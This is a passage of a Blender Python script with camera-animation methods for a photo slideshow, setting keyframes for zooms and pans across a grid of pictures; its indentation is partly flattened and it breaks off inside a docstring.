zoomMinZStart = zoomMinZ2
zoomMaxZStart = zoomMaxZ2
zoomMinZEnd = zoomMinZ1
zoomMaxZEnd = zoomMaxZ1
else:
zoomMinZStart = zoomMinZ1
zoomMaxZStart = zoomMaxZ1
zoomMinZEnd = zoomMinZ2
zoomMaxZEnd = zoomMaxZ2
centerPosition = self.slideshow.getCenterPosition()
cam.rotation_mode = 'XYZ'
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
cam.keyframe_insert(data_path="scale", frame=self.frame)
if not onlyEnd:
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZStart, zoomMaxZStart)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZEnd, zoomMaxZEnd)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
self.frame = self.frame + duration
def getAllPics (self):
result = list()
for p in self.slideshow.photos:
result.append(p.obj)
return result
def showAllPhotosPicZoomIn (self, picName, duration=120):
import bpy
pic = bpy.data.objects[picName]
numPhotos = len(self.slideshow.photos)#16
sizeBorder = int(math.sqrt(numPhotos))
cam = bpy.data.objects['Camera'] # bpy.types.Camera
zoomMinZ1 = 6.0
zoomMaxZ1 = 7.0
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
if sizeBorder == 6:
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
elif sizeBorder == 5:
#zoomMinZ2 = 14.0
#zoomMaxZ2 = 15.0
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
zoomMinZ1 = 3.0
zoomMaxZ1 = 4.0
elif sizeBorder == 4:
zoomMinZ2 = 12.0
zoomMaxZ2 = 13.0
elif sizeBorder == 3:
zoomMinZ2 = 10.0
zoomMaxZ2 = 11.0
elif sizeBorder == 2:
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
zoomMinZStart = zoomMinZ2
zoomMaxZStart = zoomMaxZ2
zoomMinZEnd = zoomMinZ1
zoomMaxZEnd = zoomMaxZ1
centerPosition = self.slideshow.getCenterPosition()
cam.rotation_mode = 'XYZ'
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
cam.keyframe_insert(data_path="scale", frame=self.frame)
allPics = self.getAllPics()
timeFinalPhoto = int(duration / 4)
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZStart, zoomMaxZStart)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
self.showObjects(allPics)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
#cam.location.z = centerPosition[2] + random.uniform(zoomMinZEnd, zoomMaxZEnd)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
self.showObjects([pic])
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12 - timeFinalPhoto)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12 - timeFinalPhoto)
cam.location.x += random.uniform(-0.01, 0.01)
cam.location.y += random.uniform(-0.01, 0.01)
#cam.location.z = centerPosition[2] + random.uniform(-0.001, 0.001)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
self.frame = self.frame + duration
def showAllPhotosPicZoomOut (self, picName, duration=120):
import bpy
pic = bpy.data.objects[picName]
numPhotos = len(self.slideshow.photos)#16
sizeBorder = int(math.sqrt(numPhotos))
cam = bpy.data.objects['Camera'] # bpy.types.Camera
zoomMinZ1 = 6.0
zoomMaxZ1 = 7.0
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
if sizeBorder == 6:
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
elif sizeBorder == 5:
#zoomMinZ2 = 14.0
#zoomMaxZ2 = 15.0
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
zoomMinZ1 = 3.0
zoomMaxZ1 = 4.0
elif sizeBorder == 4:
zoomMinZ2 = 12.0
zoomMaxZ2 = 13.0
elif sizeBorder == 3:
zoomMinZ2 = 10.0
zoomMaxZ2 = 11.0
elif sizeBorder == 2:
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
zoomMinZStart = zoomMinZ1
zoomMaxZStart = zoomMaxZ1
zoomMinZEnd = zoomMinZ2
zoomMaxZEnd = zoomMaxZ2
centerPosition = self.slideshow.getCenterPosition()
cam.rotation_mode = 'XYZ'
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
cam.keyframe_insert(data_path="scale", frame=self.frame)
allPics = self.getAllPics()
timeFinalPhoto = int(duration / 4)
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZStart, zoomMaxZStart)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
self.showObjects([pic])
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x = centerPosition[0] + random.uniform(-0.001, 0.001)
cam.location.y = centerPosition[1] + random.uniform(-0.001, 0.001)
#cam.location.z = centerPosition[2] + random.uniform(-0.001, 0.001)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
self.showObjects([pic])
cam.keyframe_insert(data_path="location", frame=self.frame + timeFinalPhoto)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + timeFinalPhoto)
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZEnd, zoomMaxZEnd)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
self.showObjects(allPics)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
self.frame = self.frame + duration
def showAllPhotosPic (self, picName, duration=120, zoom=True):
import bpy
pic = bpy.data.objects[picName]
numPhotos = len(self.slideshow.photos)#16
sizeBorder = int(math.sqrt(numPhotos))
cam = bpy.data.objects['Camera'] # bpy.types.Camera
zoomMinZ1 = 6.0
zoomMaxZ1 = 7.0
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
if sizeBorder == 6:
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
elif sizeBorder == 5:
#zoomMinZ2 = 14.0
#zoomMaxZ2 = 15.0
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
zoomMinZ1 = 3.0
zoomMaxZ1 = 4.0
elif sizeBorder == 4:
zoomMinZ2 = 12.0
zoomMaxZ2 = 13.0
elif sizeBorder == 3:
zoomMinZ2 = 10.0
zoomMaxZ2 = 11.0
elif sizeBorder == 2:
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
if zoom:
zoomMinZStart = zoomMinZ2
zoomMaxZStart = zoomMaxZ2
zoomMinZEnd = zoomMinZ1
zoomMaxZEnd = zoomMaxZ1
else:
zoomMinZStart = zoomMinZ1
zoomMaxZStart = zoomMaxZ1
zoomMinZEnd = zoomMinZ2
zoomMaxZEnd = zoomMaxZ2
centerPosition = self.slideshow.getCenterPosition()
cam.rotation_mode = 'XYZ'
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
cam.keyframe_insert(data_path="scale", frame=self.frame)
allPics = self.getAllPics()
timeFinalPhoto = 24*3
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZStart, zoomMaxZStart)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
if zoom:
self.showObjects(allPics)
else:
self.showObjects([pic])
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
if not zoom:
cam.location.x = centerPosition[0] + random.uniform(-0.001, 0.001)
cam.location.y = centerPosition[1] + random.uniform(-0.001, 0.001)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZStart, zoomMaxZStart)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + timeFinalPhoto)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + timeFinalPhoto)
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZEnd, zoomMaxZEnd)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
if zoom:
self.showObjects([pic])
else:
self.showObjects(allPics)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12 - timeFinalPhoto)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12 - timeFinalPhoto)
cam.location.x = centerPosition[0] + random.uniform(-0.001, 0.001)
cam.location.y = centerPosition[1] + random.uniform(-0.001, 0.001)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZEnd, zoomMaxZEnd)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
self.frame = self.frame + duration
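    # A refactoring sketch (hypothetical): the zoom tables repeated in the four
    # showAllPhotos* methods above could be collapsed into one helper, e.g.
    #
    #     def _zoomRange(self, sizeBorder):
    #         near = (3.0, 4.0) if sizeBorder == 5 else (6.0, 7.0)
    #         far = {5: (8.0, 9.0), 4: (12.0, 13.0), 3: (10.0, 11.0),
    #                2: (8.0, 9.0)}.get(sizeBorder, (16.0, 17.0))
    #         return near, far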
    def showLinePhotosGroup (self, duration=120, picNameStart=None, picNameEnd=None, zoom=None, groupStart=None, groupEnd=None):
        """Travel from a start photo to an end photo, fitting optional groups of pictures into view."""
        import bpy
numPhotos = len(self.slideshow.photos)#16
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
picStart = None
if picNameStart is None:
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
picStart = bpy.data.objects[picName]
else:
picStart = bpy.data.objects[picNameStart]
zoomMinZ = 3.5
zoomMaxZ = 5.0
if zoom == 0:
zoomMinZ = 1.8
zoomMaxZ = 2.5
elif zoom == 1:
zoomMinZ = 2.5
zoomMaxZ = 3.5
elif zoom == 2:
zoomMinZ = 5.0
zoomMaxZ = 6.0
elif zoom == 3:
zoomMinZ = 7.0
zoomMaxZ = 8.0
timeStartEnd = int(duration / 6)
cam.rotation_mode = 'XYZ'
cam.location.x = picStart.location.x + random.uniform(-0.01, 0.01)
cam.location.y = picStart.location.y + random.uniform(-0.01, 0.01) + ADJUST_Y
cam.location.z = picStart.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
if groupStart is not None and len(groupStart) > 0:
pics = list()
for groupName in groupStart:
picGroup = bpy.data.objects[groupName]
pics.append(picGroup)
self.showObjects(pics)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.keyframe_insert(data_path="scale", frame=self.frame)
cam.location.x += random.uniform(-0.01, 0.01)
cam.location.y += random.uniform(-0.01, 0.01)
#cam.location.z = picStart.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + timeStartEnd)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + timeStartEnd)
picEnd = None
if picNameEnd is None:
endIdx = random.randint(1, numPhotos)
picName = 'pic' + str(endIdx)
picEnd = bpy.data.objects[picName]
else:
picEnd = bpy.data.objects[picNameEnd]
cam.location.x = picEnd.location.x + random.uniform(-0.01, 0.01)
cam.location.y = picEnd.location.y + random.uniform(-0.01, 0.01) + ADJUST_Y
cam.location.z = picEnd.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
if groupEnd is not None and len(groupEnd) > 0:
pics = list()
for groupName in groupEnd:
picGroup = bpy.data.objects[groupName]
pics.append(picGroup)
self.showObjects(pics)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - timeStartEnd - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - timeStartEnd - 12)
cam.location.x += random.uniform(-0.01, 0.01)
cam.location.y += random.uniform(-0.01, 0.01)
#cam.location.z = picStart.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
self.frame = self.frame + duration
def showLinePhotos (self, duration=120, picNameStart=None, picNameEnd=None, zoom=None):
import bpy
numPhotos = len(self.slideshow.photos)#16
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
picStart = None
if picNameStart is None:
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
picStart = bpy.data.objects[picName]
else:
picStart = bpy.data.objects[picNameStart]
zoomMinZ = 3.5
zoomMaxZ = 5.0
if zoom == 0:
zoomMinZ = 1.8
zoomMaxZ = 2.5
elif zoom == 1:
zoomMinZ = 2.5
zoomMaxZ = 3.5
elif zoom == 2:
zoomMinZ = 5.0
zoomMaxZ = 6.0
elif zoom == 3:
zoomMinZ = 7.0
zoomMaxZ = 8.0
timeStartEnd = int(duration / 8)
cam.rotation_mode = 'XYZ'
cam.location.x = picStart.location.x + random.uniform(-0.01, 0.01)
cam.location.y = picStart.location.y + random.uniform(-0.01, 0.01)
cam.location.z = picStart.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
self.showObjects([picStart])
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.keyframe_insert(data_path="scale", frame=self.frame)
cam.location.x += random.uniform(-0.01, 0.01)
cam.location.y += random.uniform(-0.01, 0.01)
#cam.location.z = picStart.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + timeStartEnd)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + timeStartEnd)
picEnd = None
if picNameEnd is None:
endIdx = random.randint(1, numPhotos)
picName = 'pic' + str(endIdx)
picEnd = bpy.data.objects[picName]
else:
picEnd = bpy.data.objects[picNameEnd]
cam.location.x = picEnd.location.x + random.uniform(-0.01, 0.01)
cam.location.y = picEnd.location.y + random.uniform(-0.01, 0.01)
cam.location.z = picEnd.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
self.showObjects([picEnd])
cam.keyframe_insert(data_path="location", frame=self.frame + duration - timeStartEnd - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - timeStartEnd - 12)
cam.location.x += random.uniform(-0.01, 0.01)
cam.location.y += random.uniform(-0.01, 0.01)
#cam.location.z = picStart.location.z + random.uniform(zoomMinZ, zoomMaxZ)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
self.frame = self.frame + duration
def showRowColumn (self, numPhotos, maxFrames):
import bpy
incFrames = math.ceil(maxFrames / numPhotos)
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + random.uniform(3.5, 5.0)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
endIdx = random.randint(1, numPhotos)
picName = 'pic' + str(endIdx)
pic = bpy.data.objects[picName]
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + random.uniform(3.5, 5.0)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + incFrames)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + incFrames)
self.frame = self.frame + incFrames + 12.0
def showZoomInOutDuration (self, duration=120):
import bpy
numPhotos = len(self.slideshow.photos)#16
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
startZ = random.uniform(2.0, 5.0)
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + 1.0 + startZ
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
endZ = startZ - 3.0 if startZ > 3.0 else startZ + 2.0
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + 1.0 + endZ
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration)
self.frame = self.frame + duration + 12.0
def showZoomInOut (self, numPhotos, maxFrames):
import bpy
incFrames = math.ceil(maxFrames / numPhotos)
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
startZ = random.uniform(2.0, 5.0)
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + 1.0 + startZ
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
endZ = startZ - 3.0 if startZ > 3.0 else startZ + 2.0
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + 1.0 + endZ
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + incFrames)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + incFrames)
self.frame = self.frame + incFrames + 12.0
    # Zooms the camera in toward a photo and back out again
def showDeleite (self, numPhotos, maxFrames):
import bpy
incFrames = math.ceil(maxFrames / numPhotos)
mitad1Frames = incFrames/2
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
initZ = 2.0
startZ = random.uniform(2.0, 5.0)
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + math.ceil(incFrames/2))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + math.ceil(incFrames/2))
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + incFrames)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + incFrames)
self.frame = self.frame + incFrames + 12.0
def showDeleiteDuration (self, duration=120, picName=None):
import bpy
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
if picName is None:
print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> numPHOTOSOSSSSSSSSSSSS = " + str(numPhotos))
numPhotos = len(self.slideshow.photos)#16
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
initZ = 2.0
startZ = random.uniform(2.0, 5.0)
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + math.ceil(duration/2))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + math.ceil(duration/2))
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
self.frame = self.frame + duration
    def showObjects (self, selection):
        """Select only the given objects and fit the camera view to them."""
        import bpy
scene = bpy.context.scene
for obj in scene.objects:
obj.select = False
for obj in selection:
obj.select = True
bpy.ops.view3d.camera_to_view_selected()
'''
def getDistanceMaxXY (self, pic1, pic2):
result = None
result = (maxX, maxY)
return result
'''
'''
from bpy import context
# Select objects that will be rendered
for obj in scene.objects:
obj.select = False
for obj in context.visible_objects:
if not (obj.hide or obj.hide_render):
obj.select = True
bpy.ops.view3d.camera_to_view_selected()
'''
'''
camera_fit_coords(scene, coordinates)
Compute the coordinate (and scale for ortho cameras) given object should be to ‘see’ all given coordinates
Parameters:
scene (Scene) – Scene to get render size information from, if available
